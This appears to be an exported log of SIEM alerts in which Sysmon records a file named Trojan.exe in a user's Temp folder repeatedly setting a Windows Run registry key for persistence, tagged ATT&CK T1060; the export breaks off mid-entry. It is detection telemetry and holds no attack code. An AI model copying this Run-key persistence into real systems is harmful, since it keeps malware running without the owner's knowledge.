HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:40.051225700Z"",""eventRecordID"":""1419"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:40.049\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:40.049"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:52.363",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:39.034 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:39.035504200Z"",""eventRecordID"":""1418"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:39.034\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:39.034"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:52.286",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:38.017 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:38.020685200Z"",""eventRecordID"":""1415"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:38.017\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:38.017"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:52.179",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:37.002 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:37.013873700Z"",""eventRecordID"":""1414"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:37.002\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:37.002"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:49.113",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:35.971 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:35.973204800Z"",""eventRecordID"":""1412"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:35.971\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:35.971"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:48.100",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:34.955 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:34.956908100Z"",""eventRecordID"":""1410"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:34.955\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:34.955"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:47.067",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:33.940 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:33.955289500Z"",""eventRecordID"":""1408"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:33.940\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:33.940"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:46.070",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:32.908 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:32.912986200Z"",""eventRecordID"":""1406"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:32.908\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:32.908"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:44.099",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:31.893 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:31.907245900Z"",""eventRecordID"":""1405"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:31.893\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:31.893"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:44.097",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:30.877 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:30.924483400Z"",""eventRecordID"":""1404"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:30.877\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:30.877"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:43.085",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:29.832 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:29.878416100Z"",""eventRecordID"":""1403"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:29.832\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:29.832"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:42.020",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:28.690 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 